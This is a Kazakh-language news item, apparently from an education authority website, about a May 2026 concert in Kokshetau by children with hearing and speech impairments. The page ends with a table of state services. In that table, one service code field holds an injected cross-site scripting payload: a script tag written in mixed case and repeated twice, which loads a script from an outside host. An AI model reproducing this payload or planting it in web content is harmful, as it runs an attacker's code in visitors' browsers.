18.05.2026
2026 жылғы 15 мамырда Көкшетау қаласында есту және сөйлеу қабілетінде бұзылыстары бар балаларды, педагогтерді және арнайы әрі инклюзивті білім беру мәселелеріне бейжай қарамайтын жандарды біріктірген «Жүрекпен есту сыйы» атты мерекелік іс-шара өтті. Іс-шара Үкілі Ыбырай атындағы облыстық филармонияда ұйымдастырылып, әрбір баланың мүмкіндігіне сенудің, қолдаудың және шығармашылықтың қаншалықты маңызды екенін көрсеткен жарқын мерекеге айналды.
Сахна балаға өзін ашуға, өзіне деген сенімділікті сезінуге, қоршаған ортамен қарым-қатынас жасауды үйренуге және эмоцияларын музыка, қимыл, ым-ишара мен шығармашылық арқылы жеткізуге көмектеседі.
Концерттік бағдарламада вокалдық және хореографиялық нөмірлер, театрландырылған қойылымдар мен ансамбльдік орындаулар көрсетілді. Іс-шараға есту және сөйлеу қабілетінде бұзылыстары бар балаларға арналған №4 арнайы мектеп-интернатының оқушылары мен педагогтері қатысты.
Мұндай шаралардың қоғамға ерекше білім беру қажеттіліктері бар балалардың мәселелері мен ерекшеліктерін тереңірек түсінуге ықпал ететіні аса маңызды. Өнер түрлі мүмкіндігі бар адамдарды жақындастырып, өзара түсіністік, сыйластық пен қолдау ортасын қалыптастырады.
Есту қабілетінде бұзылысы бар бала үшін шығармашылық қызметке қатысу – тек қабілеттерін дамыту ғана емес, сонымен қатар әлеуметтенудің, коммуникативтік дағдыларды қалыптастырудың және эмоционалдық саулықты нығайтудың маңызды құралы. Сахнаға әрбір шығу – сенімсіздікті жеңудегі кішкентай жеңіс және қоғамға табысты бейімделуге жасалған қадам.
Біз балалардың жүрекпен ести алатынына, жүрекпен сезіне алатынына және сөзсіз-ақ түсінікті болатын шынайы эмоцияларды айналасына сыйлай алатынына сенеміз.
Сурдопедагог: Еркинова А.Е.
| № п/п | Коды қызметтер тізіліміне сәйкес мемлекеттік қызметтерді | Атауы қызметтер | Нысанын жүктеу | Қызмет online |
|---|---|---|---|---|
| 1 | 2 | 3 | 4 | 5 |
| 1 | 803018 | Мұғалімдерді аттестациялауға құжаттарды қабылдау. | Инструкция получения электронной услуги | |
| 2 | 803010-1 | Мемлекеттік білім беру ұйымдарындағы бос немесе уақытша бос лауазымға орналасуға конкурсқа қатысу үшін мұғалімдерден құжаттарды қабылдау. | Инструкция получения электронной услуги | |
| 3 | 00402006<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt> | Жергілікті атқарушы органдар көрсететін психологиялық-педагогикалық қолдау көрсету саласындағы мемлекеттік қызметтерді көрсету қағидаларын бекіту туралы» | Инструкция получения электронной услуги |